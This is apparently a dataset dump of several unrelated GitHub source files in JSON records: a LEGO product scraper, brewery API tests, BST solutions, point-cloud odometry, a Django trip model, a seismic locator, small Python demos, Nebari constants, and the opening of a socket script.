urljoin\nfrom product_spiders.items import Product, ProductLoader\nimport re\n\n\nclass BootsSpider(BaseSpider):\n name = u'legouk-boots.com'\n allowed_domains = [u'www.boots.com']\n start_urls = [u'http://www.boots.com/en/LEGO/']\n\n def _start_requests(self):\n yield Request('http://www.boots.com/en/LEGO-Disney-Princess-Ariels-Treasure-41050_1492544/',\n callback=self.parse_product)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n anchors = hxs.select('//div[@class=\"narrowResults\"]/div/ul/li[position()>1]/a')\n for anchor in anchors:\n url = anchor.select('@href').extract().pop()\n cat = anchor.select('text()').extract().pop().strip()\n yield Request(urljoin(base_url, url),\n callback=self.parse_category,\n meta={\"category\": cat})\n\n def parse_category(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n products = hxs.select('//a[@class=\"productName\"]/@href').extract()\n for url in products:\n yield Request(urljoin(base_url, url),\n callback=self.parse_product,\n meta={\"category\": response.meta['category']})\n\n pages = hxs.select('//li[@class=\"paginationTop\"]//a/@href').extract()\n for url in pages:\n yield Request(urljoin(base_url, url),\n callback=self.parse_category,\n meta={\"category\": response.meta['category']})\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n name = hxs.select('//span[@itemprop=\"name\"]/text()').extract().pop().strip()\n\n quantity = hxs.select('//*[@id=\"cpQuantity\"]')\n if quantity:\n stock = True\n else:\n stock = False\n\n # cat_regex = 'LEGO 
Duplo|LEGO Bricks and More|LEGO Bricks|LEGO Creator|LEGO City|LEGO Ninjago|LEGO Monster Fighters|LEGO Super Heros|LEGO Lord Of The Rings|LEGO Star Wars|LEGO Games'\n\n        try:\n            identifier = hxs.select('//form[@name=\"TMS\"]/input[@type=\"hidden\" and @name=\"productId\"]/@value').extract()[0]\n        except:\n            identifier = re.search(r'_(\\d+)/', response.url).groups()[0]\n\n        loader = ProductLoader(response=response, item=Product())\n        loader.add_value('url', urljoin(base_url, response.url))\n        loader.add_value('name', name)\n        loader.add_xpath('image_url', '//meta[@property=\"og:image\"]/@content')\n        loader.add_xpath('price', '//p[@class=\"productOfferPrice\"]/text()[1]', TakeFirst(), re=\"([.0-9]+)\")\n        loader.add_value('category', response.meta.get('category'))\n        loader.add_value('sku', name, re=' (\\d\\d\\d+)\\s*$')\n        loader.add_value('brand', \"LEGO\")\n        loader.add_value('identifier', identifier)\n\n        if not quantity:\n            loader.add_value('stock', 0)\n\n        yield loader.load_item()\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/lego_uk/bootscom.py","file_name":"bootscom.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"32896311974","text":"import pytest\n\nfrom openbrewerydb_api_tests import configuration as CONF\n\nWORDS = [\n    'brewery',\n    'fox',\n    'ruhstaller%20beer',\n    'ruhstaller_beer',\n    'san',\n    'san%20brewery',\n    'wolf',\n]\n\n\nclass TestAutocompleteResponse:\n    \"\"\"\"\"\"\n\n    @pytest.fixture(scope='class', params=WORDS)\n    def dataset(self, request, api_client):\n        \"\"\"returns the result of the request to api\"\"\"\n\n        endpoint = CONF.ENDPOINT_TEMPLATES['autocomplete'].format(request.param)\n        response = api_client.get(endpoint).json()\n        return request.param, response\n\n    def test_response_not_empty(self, dataset):\n        \"\"\"response data is not empty\"\"\"\n\n        word, response = dataset\n        assert response\n\n    def test_response_autocomplete_match(self, api_client, dataset):\n        \"\"\"request word occurs in response data\"\"\"\n\n        word, response = dataset\n        ids = [item['id'] for item in response]\n\n        for id in ids:\n            endpoint = CONF.ENDPOINT_TEMPLATES['id'].format(id)\n            data = api_client.get(endpoint).json()\n            # ignore fields with id\n            values = [value for value in data.values() if isinstance(value, str)]\n\n            assert data and filter(lambda x: word in x.lower(), values)\n\n\nclass TestAutocompleteResponseBadValue:\n    @pytest.mark.parametrize(\n        'value',\n        ('53cf66ac', '{}', 'running__dogs__brewery', 'running%20%20dogs%20%20brewery',\n         'running.dogs.brewery', 'running-dogs-brewery', 'runningdogsbrewery',\n         '%20brewery', 'modern,times', '%20', '%20running%20dogs%20brewery', ''))\n    def test_autocomplete_response_bad_value(self, api_client, value):\n        \"\"\"an autocomplete request returns an empty list if a bad value is passed\"\"\"\n\n        endpoint = CONF.ENDPOINT_TEMPLATES['autocomplete'].format(value)\n        response = api_client.get(endpoint)\n        assert response.json() == []\n","repo_name":"vshagur/openbrewerydb-api-tests","sub_path":"openbrewerydb_api_tests/tests/test_api_autocomplete.py","file_name":"test_api_autocomplete.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"10251230229","text":"class TreeNode(object):\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\n# recursive\nclass Solution(object):\n
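    # classic BST lookup: recurse left or right by comparing val with the current node\n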
    def searchBST(self, root, val):\n        \"\"\"\n        :type root: TreeNode\n        :type val: int\n        :rtype: TreeNode\n        \"\"\"\n        if not root: return None\n        if val == root.val:\n            return root\n        if val > root.val:\n            return self.searchBST(root.right, val)\n        if val < root.val:\n            return self.searchBST(root.left, val)\n\n\n# iterative, in-order traversal\nclass Solution(object):\n    def searchBST(self, root, val):\n        if not root: return None\n        stack = [root]\n\n        while stack:\n            node = stack.pop()\n            if val == node.val:\n                return node\n            if val > node.val:\n                if node.right:\n                    stack.append(node.right)\n                else:\n                    return None\n                continue\n            if val < node.val:\n                if node.left:\n                    stack.append(node.left)\n                else:\n                    return None\n                continue","repo_name":"Fyw1988/Leetcode","sub_path":"二叉树/700.py","file_name":"700.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"18174256784","text":"import os\nimport numpy as np\n\n# from icp import ICP\nfrom icp_odometry.icp.icp import ICP\nfrom icp_odometry.util.util_pc import transform_pc, savePlyFromPtsRGB\nfrom icp_odometry.util.util_spatial import convert_matrix_to_translation_quaternion\n\n\nclass Odometry:\n    def __init__(self, point_clouds_np, point_clouds_name, save_path=None):\n        self.point_clouds_np = point_clouds_np\n        self.point_clouds_name = point_clouds_name\n        self.poses_stamped = []\n        if save_path is None:\n            self.save_path = os.path.dirname(os.path.abspath(__file__))\n        else: \n            self.save_path = save_path\n        os.makedirs(self.save_path, exist_ok=True)\n        print('Save path is: {}'.format(self.save_path))\n\n\n    def compute_trajectory(self, method='point_to_plane', first_pose=np.eye(4), \n            save_individual_poses_ply=False, save_trajectory_txt=False):\n        '''\n        :param method: 'point_to_point' or 'point_to_plane'\n        :param first_pose: 4x4 transformation matrix for the first point cloud\n        :return: 4x4 transformation matrix T_old__new i.e. transform new scan to old scan's frame\n        '''\n        trajectory = []\n        trajectory.append(first_pose)\n        if save_trajectory_txt:\n            save_pose_file_path = os.path.join(self.save_path,'pose.txt')\n            with open(save_pose_file_path, 'w') as f:\n                f.write('# timestamp tx ty tz qx qy qz qw\\n') \n            self.write_pose_to_txt_TUM(first_pose, self.point_clouds_name[0], save_pose_file_path)\n\n        \n\n        for i in range(len(self.point_clouds_np)-1):\n            old_scan = self.point_clouds_np[i]\n            new_scan = self.point_clouds_np[i+1]\n            icp = ICP(old_scan, new_scan)\n            icp.range_filtering(min_range=3, max_range=100)\n            if method == 'point_to_point':\n                T_old_new = icp.icp_point_to_point()\n            elif method == 'point_to_plane':\n                T_old_new = icp.icp_point_to_plane()\n            else: raise ValueError('method should be point_to_point or point_to_plane')\n            T_W_old = trajectory[i]\n            T_W_new = np.matmul(T_W_old, T_old_new)\n            trajectory.append(T_W_new)\n            if save_individual_poses_ply:\n                savePlyFromPtsRGB(transform_pc(T_W_new, new_scan), \n                    os.path.join(self.save_path, self.point_clouds_name[i+1] + '.ply'))\n            if save_trajectory_txt:\n                self.write_pose_to_txt_TUM(T_W_new, self.point_clouds_name[i+1], save_pose_file_path)\n        return trajectory\n    def transform_trajectory_points(self, trajectory):\n        '''\n        :param trajectory: 4x4 transformation matrix T_WB i.e. 
transform points from base frame to world frame\n :return: transformed points in world frame\n '''\n assert len(trajectory) == len(self.point_clouds_np)\n transformed_points = []\n for i in range(len(self.point_clouds_np)):\n T = trajectory[i]\n scan = self.point_clouds_np[i]\n transformed_scan = transform_pc(T, scan)\n transformed_points.append(transformed_scan)\n return transformed_points\n \n \n def write_pose_to_txt_TUM(self, T, timestamp, file_path):\n with open(file_path, 'a') as f:\n translation, quaternion = convert_matrix_to_translation_quaternion(T)\n f.write(str(timestamp)+' ')\n f.write('{:.6f} {:.6f} {:.6f} {:.6f} {:.6f} {:.6f} {:.6f}\\n'.format(\n translation[0], translation[1], translation[2],\n quaternion[0], quaternion[1], quaternion[2], quaternion[3]))\n \n \n \n","repo_name":"YifuTao/PyICP_Odometry","sub_path":"icp_odometry/odometry.py","file_name":"odometry.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36468795967","text":"from __future__ import unicode_literals\nfrom ..login_app.models import User\nfrom django.db import models\nfrom datetime import datetime\n\n\n# Create your models here.\nclass TripManager(models.Manager):\n def tripVal(self, postData):\n results = {\n 'status': True,\n 'errors': []\n }\n if not postData['destination']:\n results['status'] = False\n results['errors'].append('Please enter a destination.')\n if not postData['description']:\n results['status'] = False\n results['errors'].append('Please enter a description.')\n if not postData['start_date'] or datetime.strptime(postData['start_date'], \"%Y-%m-%d\") < datetime.now():\n results['status'] = False\n results['errors'].append('Please enter a future start date.')\n if not postData['end_date'] or postData['end_date'] < postData['start_date']:\n results['status'] = False\n results['errors'].append('Please enter an end date that comes after the start date.')\n return results\n\n def createTrip(self, postData):\n trip = Trip.objects.create(destination = postData['destination'], description=postData['description'], start_date=postData['start_date'], end_date=postData['end_date'], planned_by=User.objects.get(id=postData['planned_by']))\n return trip\n\n\nclass Trip(models.Model):\n destination = models.CharField(max_length = 100)\n description = models.CharField(max_length = 1000)\n start_date = models.DateField()\n end_date = models.DateField()\n planned_by = models.ForeignKey(User, related_name = 'first_user')\n users_joined = models.ManyToManyField(User, related_name = 'joined_users')\n objects = TripManager()\n","repo_name":"mazurbeam/travel","sub_path":"apps/travels_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27329141767","text":"from ..io.seism import QuakeCC,RecordCC\r\nfrom ..io.tool import quickTaupModel\r\nimport numpy as np\r\nfrom ..mathTool.distaz import DistAz\r\nimport os\r\nfrom numba import jit\r\n\r\nclass locator:\r\n def __init__(self,staInfos,modelFile=os.path.dirname(__file__)+'/../data/iaspTaupMat',maxDT=30):\r\n self.staInfos=staInfos\r\n self.timeM=quickTaupModel(modelFile)\r\n self.maxErr=-1\r\n self.maxDT=30\r\n def locate(self, quake,r=1,e=0.1,maxDT=-1,isDel=False,maxErr=-1):\r\n mulL=[40]*3+[20]*2+[10]*2+[8 ]*3+[5 ]*10+[3 ]*10\r\n adL =[1 ]*3+[1 ]*2+[1 ]*2+[0.75]*3+[0.5]*10+[0.1]*10\r\n #mulL=[40]*2+[20]*2+[10]*2+[8 
]*2+[5 ]*3+[3 ]*5\r\n #adL =[1 ]*2+[1 ]*2+[1 ]*2+[0.75]*2+[0.5]*3+[0.25]*5\r\n time=365*86400*100\r\n quake['dep']=10+10*np.random.rand(1)\r\n quake['time']=float(quake['time'])\r\n self.maxErr=maxErr\r\n if maxDT<0:\r\n maxDT=self.maxDT\r\n for i in range(len(quake)):\r\n record=quake.records[i]\r\n staInfo=self.staInfos[record['staIndex']]\r\n if record['pTime']0 and record['pTime']-quake['time']0 and record['sTime']-quake['time']maxErr)[0]\r\n for i in nvalidL:\r\n rIndex=rIndexL[i]\r\n if phaseL[i]=='p':\r\n quake.records[rIndex]['pTime']=0\r\n if phaseL[i]=='s':\r\n quake.records[rIndex]['sTime']=0\r\n quake.removeZeros() \r\n dTime=dTime[validL]\r\n gM=gM[validL,1:5]\r\n wL=wL[validL]\r\n gM=np.mat(wL.reshape((-1,1))*gM)\r\n dTime=np.mat(wL*dTime)\r\n gMT=gM.transpose()\r\n dM=gMT*dTime.transpose()\r\n gMTgM=gMT*gM\r\n gMTgM[2,2]=gMTgM[2,2]+e\r\n gMTgM[1,1]=gMTgM[1,1]+e\r\n gMTgM[0,0]=gMTgM[0,0]+e\r\n gMTgM[3,3]=gMTgM[3,3]+e/100\r\n MM=np.linalg.pinv(gMTgM)\r\n dd=MM*dM\r\n #print(dd)\r\n quake['la']+=float(dd[0,0])*ad\r\n quake['lo']+=float(dd[1,0])*ad\r\n quake['dep']=float(max(-4,quake['dep']+float(dd[2,0])*ad))\r\n quake['time']+=float(dd[3,0])\r\n return quake,dTime.std()\r\n @jit\r\n def __timeG__(self,quake,phaseL,staIndexL):\r\n gM=np.zeros((len(phaseL),5))\r\n loc=quake.loc()\r\n for i in range(len(phaseL)):\r\n staLa=self.staInfos[staIndexL[i]]['la']\r\n staLo=self.staInfos[staIndexL[i]]['lo']\r\n dep=self.staInfos[staIndexL[i]]['dep']/1000\r\n dd=0.0001\r\n ddz=1\r\n delta=DistAz(loc[0],loc[1],\\\r\n staLa,staLo).delta\r\n time=self.timeM.get_travel_times(\\\r\n np.abs(loc[2]+dep),delta,phaseL[i])[0].time\r\n ddLa=(DistAz(loc[0]+dd,loc[1],\\\r\n staLa,staLo).delta-delta)/dd\r\n ddLo=(DistAz(loc[0],loc[1]+dd,\\\r\n staLa,staLo).delta-delta)/dd\r\n dTime=(self.timeM.get_travel_times(\\\r\n np.abs(loc[2]+dep),delta+dd,phaseL[i])[0].time-\\\r\n time)/dd\r\n ddLaTime=dTime*ddLa\r\n ddLoTime=dTime*ddLo\r\n ddZTime=(self.timeM.get_travel_times(np.abs(loc[2]+dep+ddz),delta,phaseL[i])[0].time-\\\r\n time)/ddz\r\n gM[i,0]=time\r\n gM[i,1]=ddLaTime\r\n gM[i,2]=ddLoTime\r\n gM[i,3]=ddZTime\r\n gM[i,4]=1\r\n #print(gM)\r\n #return\r\n\r\n return gM\r\n\r\n def getG(self,quake,quakeRef=None,minCC=0.5,minMul=0):\r\n staIndexL=[]\r\n phaseL=[]\r\n if quakeRef != None:\r\n return self.getGRef(quake,quakeRef,minCC=minCC,minMul=minMul)\r\n for record in quake:\r\n if record['pTime']>0:\r\n if isinstance(record,RecordCC):\r\n if record['pCC']0:\r\n if isinstance(record,RecordCC):\r\n if record['sCC']0 and record['staIndex'] in indexLRef>0:\r\n if isinstance(record,RecordCC):\r\n if record['pCC']0 and record['staIndex'] in indexLRef>0:\r\n if isinstance(record,RecordCC):\r\n if record['SCC']0:\r\n timeG[:,-1]*=10\r\n timeG[:,-2]*=111\r\n G=timeG.transpose()*timeG\r\n i=np.arange(G.shape[0])\r\n G/=G[i,i].sum()\r\n V,v=np.linalg.eig(G)\r\n else:\r\n G=np.zeros((3,3))\r\n V=[-9,-9,-9]\r\n v=np.zeros((3,3))\r\n return G,V,v,quake.calCover(self.staInfos,minCC=minCC)\r\n\r\n def locateRef(self, quake,quakeRef,r=1,e=0.00001,maxDT=-1,minCC=0.4):\r\n mulL=[40]\r\n adL =[1]\r\n time=365*86400*100\r\n if maxDT<0:\r\n maxDT=self.maxDT\r\n #quake.loc[2]=10+10*np.random.rand(1)\r\n for i in range(3):\r\n quake['la'],quake['lo'],quake['dep']=\\\r\n quakeRef['la'],quakeRef['lo'],quakeRef['dep']\r\n for i in range(len(mulL)):\r\n quake,res=self.__locateRef__(quake,quakeRef,mul=mulL[i],\\\r\n r=r,ad=adL[i],e=e,maxDT=maxDT,minCC=minCC)\r\n return quake,res\r\n def 
__locateRef__(self,quake,quakeRef,mul=10,r=1,ad=1,\\\r\n e=0.00001,maxDT=35,minCC=0.4):\r\n phaseL=[]\r\n timeL=[]\r\n staIndexL=[]\r\n wL=[]\r\n indexLRef=quakeRef.staIndexs()\r\n for record in quake.records:\r\n index = record['staIndex']\r\n if index in indexLRef:\r\n indexRef = indexLRef.index(index)\r\n else:\r\n continue\r\n if record['pTime']>0 and quakeRef.records[indexRef]['pTime']>0 \\\r\n and record['pTime']-quake['time']0 and quakeRef.records[indexRef]['sTime']>0 \\\r\n and record['sTime']-quake['time']10:\r\n gM[i,0]=quakeRef.records[indexRef]['pTime']-quakeRef['time']\r\n #print(staIndexL[i],gM[i,0],p[staIndexL[i]]-quake.time)\r\n else:\r\n if quakeRef.records[indexRef]['sTime']>10:\r\n gM[i,0]=quakeRef.records[indexRef]['sTime']-quakeRef['time']\r\n #print(gM[i,0])\r\n gM[i,1]=ddLaTime\r\n gM[i,2]=ddLoTime\r\n gM[i,3]=ddZTime\r\n gM[i,4]=1\r\n return gM\r\n\r\ndef getRefM(quakeRefs,staInfos):\r\n staN=len(staInfos)\r\n qN=len(quakeRefs)\r\n timeM=np.zeros((qN,staN))\r\n laloM=np.zeros((qN,2))\r\n for i in range(qN):\r\n timeM[i,:]=np.sign(quakeRefs[i].getPTimeL(staInfos)).reshape((1,-1))\r\n laloM[i,:]=np.array(quakeRefs[i].loc()[:2]).reshape((1,-1))\r\n return timeM,laloM\r\n\r\ndef findNearQuake(quake,timeM,laloM,staInfos,maxDis=0.2,minSta=5):\r\n sameStaN=(timeM*quake.getPTimeL(staInfos)).sum(axis=1)\r\n dis=np.linalg.norm(laloM-np.array(quake.loc()[:2]).reshape((1,-1)),axis=1)\r\n index=(dis/(1+sameStaN/100*(dismaxDis or sameStaN[index] < minSta:\r\n return None\r\n return index\r\ndef getTmpD(quakeTmpL):\r\n tmpD={}\r\n count=0\r\n for quake in quakeTmpL:\r\n tmpD[quake.filename]=count\r\n count+=1\r\n return tmpD\r\ndef relocQuakeByTmp(quakeLs,quakeTmpL,staInfos):\r\n loc=locator(staInfos)\r\n tmpD=getTmpD(quakeTmpL)\r\n for quakeL in quakeLs:\r\n for quake in quakeL:\r\n loc.locateRef(quake,quakeTmpL[tmpD[quake.filename]])\r\n return quakeLs\r\n\r\n\r\ndef relocQuakeLs(quakeLs,quakeRefs,staInfos):\r\n timeM,laloM=getRefM(quakeRefs,staInfos)\r\n quakeRelocL=[]\r\n loc=locator(staInfos)\r\n count0=0\r\n count=0\r\n for quakeL in quakeLs:\r\n for quake in quakeL:\r\n #quake,res=loc.locate(quake)\r\n index=findNearQuake(quake,timeM,laloM,staInfos,maxDis=0.2)\r\n count0+=1\r\n #\r\n if index!=None:\r\n count+=1\r\n #print(index)\r\n print(count0,count,'###',quake.loc(),quakeRefs[index].loc())\r\n quake,res=loc.locateRef(quake,quakeRefs[index])\r\n print(count0,count,'***',quake.loc(),quakeRefs[index].loc(),res)\r\n quakeRelocL.append(quake)\r\n return quakeRelocL\r\n\r\n","repo_name":"baogegeJiang/SeismTool","sub_path":"locate/locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":15030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12393586666","text":"# jobs/models.py\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.urls import reverse\nfrom ckeditor.fields import RichTextField\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom hitcount.models import HitCountMixin, HitCount\n\n\nclass Job(models.Model, HitCountMixin):\n # Host will not always be the current user. 
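The author who posts the listing can differ from the host it is posted for, so both are stored.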
\n    host = models.ForeignKey(\n        get_user_model(),\n        on_delete=models.CASCADE,\n        related_name = 'host'\n    )\n    author = models.ForeignKey(\n        get_user_model(),\n        on_delete=models.CASCADE,\n        related_name = 'author',\n        null=True,\n    )\n    title = models.CharField(max_length=255)\n    body = RichTextField(blank=True, null=True)\n    #body = models.TextField()\n    date = models.DateTimeField(auto_now_add=True)\n    company = models.CharField(max_length=255) #change this in the future\n    url = models.URLField(blank=True, null=True)\n    accepted = models.BooleanField(default=False)\n    hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk',\n        related_query_name='hit_count_generic_relation')\n\n    def __str__(self):\n        return self.title\n\n    def get_absolute_url(self):\n        return reverse('job_detail', args=[str(self.id)])\n        #return reverse('home')\n\n    def get_full_name(self):\n        if not self.user.first_name:\n            return\n        return ' '.join([self.user.first_name, self.user.last_name])\n    \n    def get_url(self):\n        if not self.url:\n            return '#'\n        return self.url\n    ","repo_name":"mattambrogi/job-board-platform","sub_path":"jobs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"6594296367","text":"direction = [[[0,0],[1,0],[0,1]],[[0,0],[0,1],[1,1]],[[0,0],[1,0],[1,1]],[[0,0],[1,0],[1,-1]]]\ndef possible(board, shape, cur):\n    for i in shape:\n        if(board[cur[0]+i[0]][cur[1]+i[1]]=='#'):\n            return False\n    return True\n    \n\ndef set(board, shape, cur, dec):\n    newBoard = board\n    if dec == 1:\n        for i in shape:\n            newBoard[cur[0]+i[0]][cur[1]+i[1]] = '#'\n    else:\n        for i in shape:\n            newBoard[cur[0]+i[0]][cur[1]+i[1]] = '.'\n    return newBoard\ndef count(board,h,w):\n    sum = 0\n    ret = 0\n    for i in range(0,h+2):\n        for j in range(0,w+2):\n            if board[i][j] == '.':\n                sum +=1\n    if sum == 0:\n        return 1\n    cur = []\n    for i in range(0,h+2):\n        if len(cur) != 0:\n            break\n        for j in range(0,w+2):\n            if board[i][j] == '.':\n                cur.append(i)\n                cur.append(j)\n                break\n    for i in range(4):\n        shape = direction[i]\n        if possible(board,shape,cur)==True:\n            board = set(board,shape,cur,1)\n            ret += count(board,h,w)\n            board = set(board,shape,cur,-1)\n    return ret\n\n\n\nif __name__==\"__main__\":\n    h = int(input())\n    w = int(input())\n    board = []\n    blocks = ['#']*(w+2)\n    board.append(blocks)\n\n    for i in range(0,h):\n        line = input()\n        temp = ['#']\n        for i in range(0, len(line)):\n            temp.append(line[i])\n        temp.append('#')\n        board.append(temp)\n    board.append(blocks)\n    res = count(board,h,w)\n    print(res)\n","repo_name":"taejuk/algorithm","sub_path":"algorithm1/chapter_6/boardcover.py","file_name":"boardcover.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"37376439722","text":"import cv2\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n    print(\"Cannot open camera\")\n    exit()\nwhile True:\n
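    # main loop: grab a frame, convert it to grayscale, and display it until 'q' is pressed\n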
    ret, frame = cap.read()\n    if not ret:\n        print(\"Cannot receive frame\")\n        break\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # convert to a grayscale image\n    cv2.imshow('oxxostudio', gray)\n    if cv2.waitKey(1) == ord('q'):\n        break # press the q key to stop\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"oxxostudio/book-code","sub_path":"opencv/ch04/code02.py","file_name":"code02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
{"seq_id":"12792968190","text":"'''\nCreated on Oct 22, 2015\n\n@author: al341802-Miguel Matey Sanz\n'''\n\nn=int(input(\"Enter an integer: \"))\n\nsuma=0\nanterior1=1\nanterior2=0\nveces=2\nprint('The first',n, 'Fibonacci numbers are: 1',end=' ')\nwhile veces<=n:\n    suma=anterior1+anterior2\n    anterior2=anterior1\n    anterior1=suma\n    veces+=1\n    print(suma, end=' ')\n    \n    \n","repo_name":"matey97/Programacion","sub_path":"Boletín2/Ejercicio37.py","file_name":"Ejercicio37.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"74765908571","text":"from random import randint\nimport time\n\ndef springRain():\n\n    #user input\n    selectedWidth = int(input(\"Please enter frame's width: \\n\"))\n    selectedHeight = int(input(\"Please enter frame's height: \\n\"))\n\n    #create a frame template filled with \"o\"s\n    completeFrame = [[\"o\"] * selectedWidth] * selectedHeight\n\n    numberOfIterations = 1\n\n    while True:\n        #iterate over rows in a frame\n        for yPosition in range(0, selectedHeight):\n\n            x = 0\n            while (x <= yPosition):\n\n                randomDropPosition = randint(1, selectedWidth)\n                temporaryLineTemplate = [\"o\"] * selectedWidth\n                temporaryLineTemplate[randomDropPosition - 1] = \"x\"\n\n                #add a new frame on the first place of the completeFrame list\n                completeFrame.insert(0, temporaryLineTemplate)\n\n                #print every object of completeFrame in a for loop\n                for object in range(0, len(completeFrame)):\n                    tempLine = completeFrame[object]\n                    print(\" \".join(tempLine))\n\n                time.sleep(0.3)\n\n                #\"clear\" the console by printing multiple \\n\n                print('\\n' * 80)\n\n                #pop the completeFrame's last object\n                if (len(completeFrame) > selectedHeight):\n                    completeFrame.pop()\n\n                #add +1 to the total number of completed lines\n                x += 1\n\nspringRain()\n","repo_name":"clapslock/python-assignments-2017","sub_path":"Class_3/Ex_1.py","file_name":"Ex_1.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"73322383450","text":"import numpy as np\nimport pandas as pd\n\n\ndef index2step(indexes, df):\n    # indexes: array of start and stop indexes ex. [[2 5] [8 12]]\n    # df: dataframe to compare to\n    return [(df[\"Step\"].iloc[i[0]], df[\"Step\"].iloc[i[1]]) for i in indexes]\n\n\ndef check_overlap(a0, af, b0, bf):\n    # returns True if there is overlap\n    return (a0 <= bf) & (af >= b0)\n\n\ndef check_three(df, iverbose=False):\n    df[\"btm\"] = df[\"Age\"] - df[\"2SD\"]\n    df[\"top\"] = df[\"Age\"] + df[\"2SD\"]\n\n    df[\"cum btm\"] = df[\"btm\"]\n    df[\"cum top\"] = df[\"top\"]\n\n    for i in np.arange(len(df)):\n        if check_overlap(df[\"cum btm\"].iloc[i], df[\"cum top\"].iloc[i], np.roll(df[\"cum btm\"], 1)[i],\n                         np.roll(df[\"cum top\"], 1)[i]):\n            df[\"cum btm\"].iloc[i] = np.maximum(df[\"cum btm\"].iloc[i], np.roll(df[\"cum btm\"], 1)[i])\n            df[\"cum top\"].iloc[i] = np.minimum(df[\"cum top\"].iloc[i], np.roll(df[\"cum top\"], 1)[i])\n\n        df[\"cum btm\"], df[\"cum top\"] = np.roll(df[\"cum btm\"], 1), np.roll(df[\"cum top\"], 1)\n\n    # overlap = 1 where there is overlap with following x\n    df[\"overlap\"] = np.roll(np.where(check_overlap(df[\"btm\"], df[\"top\"], df[\"cum btm\"], df[\"cum top\"]), 1, 0), -1)\n    df.iloc[-1, df.columns.get_loc(\"overlap\")] = 0  # to prevent last step from overlapping with first step\n\n    if iverbose:\n        print(df)\n\n    indexes = np.nonzero(df[\"overlap\"].to_numpy())[0]\n\n    try:\n        # group indexes that overlap ex. 
[[2, 6],] - index 2 through 6 (inclusive) are overlapping\n groups = np.array([(s[0], s[-1] + 1) for s in np.split(indexes, np.where(np.diff(indexes) != 1)[0] + 1)])\n if iverbose:\n print(groups)\n return np.array([group for group in groups if (group[1] - group[0]) + 1 >= 3])\n except IndexError: # indexes is empty (no overlaps at all)\n return indexes # empty numpy array\n","repo_name":"brandonm6/isochronplotter","sub_path":"locateplateaus/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36051668520","text":"CURRENT_RELEASE = \"2023.10.1\"\n\n# NOTE: Terraform cannot be upgraded further due to Hashicorp licensing changes\n# implemented in August 2023.\n# https://www.hashicorp.com/license-faq\nTERRAFORM_VERSION = \"1.5.7\"\n\n# 04-kubernetes-ingress\nDEFAULT_TRAEFIK_IMAGE_TAG = \"2.9.1\"\n\nHIGHEST_SUPPORTED_K8S_VERSION = (\"1\", \"26\", \"9\")\nDEFAULT_GKE_RELEASE_CHANNEL = \"UNSPECIFIED\"\n\nDEFAULT_NEBARI_DASK_VERSION = CURRENT_RELEASE\nDEFAULT_NEBARI_IMAGE_TAG = CURRENT_RELEASE\nDEFAULT_NEBARI_WORKFLOW_CONTROLLER_IMAGE_TAG = \"2023.7.2\"\n\nDEFAULT_CONDA_STORE_IMAGE_TAG = \"v0.4.14\"\n\nLATEST_SUPPORTED_PYTHON_VERSION = \"3.10\"\n\n\n# DOCS\nDO_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-do\"\nAZURE_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-azure\"\nAWS_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-aws\"\nGCP_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-gcp\"\n\n# DEFAULT CLOUD REGIONS\nAWS_DEFAULT_REGION = \"us-east-1\"\nAZURE_DEFAULT_REGION = \"Central US\"\nGCP_DEFAULT_REGION = \"us-central1\"\nDO_DEFAULT_REGION = \"nyc3\"\n","repo_name":"nebari-dev/nebari","sub_path":"src/_nebari/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"32"} +{"seq_id":"41011735215","text":"import socket \nimport sys \nimport random\nimport time\n\nif len(sys.argv) != 5 :\n print(\"Need to specify a port and delay. 
